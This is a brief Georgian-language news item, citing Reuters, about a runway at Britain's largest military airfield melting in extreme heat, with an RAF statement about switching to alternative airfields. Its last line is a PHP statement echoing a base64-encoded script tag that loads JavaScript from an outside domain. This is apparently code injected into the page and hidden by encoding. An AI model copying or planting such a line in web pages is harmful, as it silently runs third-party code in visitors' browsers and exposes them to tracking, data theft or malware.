celsiusi
ავერსი შნაიდერი
ბრიტანეთის უდიდეს სამხედრო აეროდრომზე მაღალი ტემპერატურის გამო ასაფრენი ბილიკი გალღვა. საჰაერო ძალების ინფორმაციით, ამჟამად თვითმფრინავისთვის ალტერნატიულ აეროდრომს იყენებენ. ამის შესახებ ინფორმაციას  Reuters ავრცელებს. 
 
"ექსტრემალური ტემპერატურის პირობებში ფრენის უსაფრთხოება ჩვენს უმთავრეს პრიორიტეტად რჩება, ამიტომ თვითმფრინავები იყენებენ ალტერნატიულ აეროდრომებს დიდი ხნის შემუშავებული გეგმის შესაბამისად. ეს ნიშნავს, რომ ამას არავითარი გავლენა არ აქვს ფრენებზე", - ნათქვამია სამეფო საჰაერო ძალების განცხადებაში.
601
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");